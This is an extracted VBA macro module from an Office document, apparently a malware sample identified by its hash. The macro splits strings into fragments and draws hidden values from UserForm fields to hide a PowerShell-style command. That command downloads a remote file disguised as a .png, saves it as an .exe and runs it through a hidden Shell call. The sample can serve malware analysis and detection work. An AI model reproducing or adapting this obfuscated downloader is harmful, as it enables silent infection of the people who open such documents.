Filename     : ./macros/e62ac7980c437398d83f5298b3f047035d6f12c974cea1fd226947af497d6afd
OLE stream   : Macros/VBA/Module2
VBA filename : Module2.bas
----------------------------------------
Attribute VB_Name = "Module2"
Sub Function1()
Str4 = ine + "le('"
str5 = "D" + "o"
Str3 = "wn" + "lo" + "ad" + "Fi"
str2 = Func_one + ")." + str5
l = "','"
alho = "e" + "ss '"
sas = str2 + Str3 + Str4 + UserForm1.tx3 + UserForm1.type1 + UserForm1.tx2
E = Exo + "ip.e" + "xe'"
Shell sas + "es/4ajfLrsR9cZVs7AqYqSzTUGVwaJhsHH81Ja.p" + "ng" + l + E + ");" + UserForm1.Label1.Caption + alho + E + ";", 0
End Sub
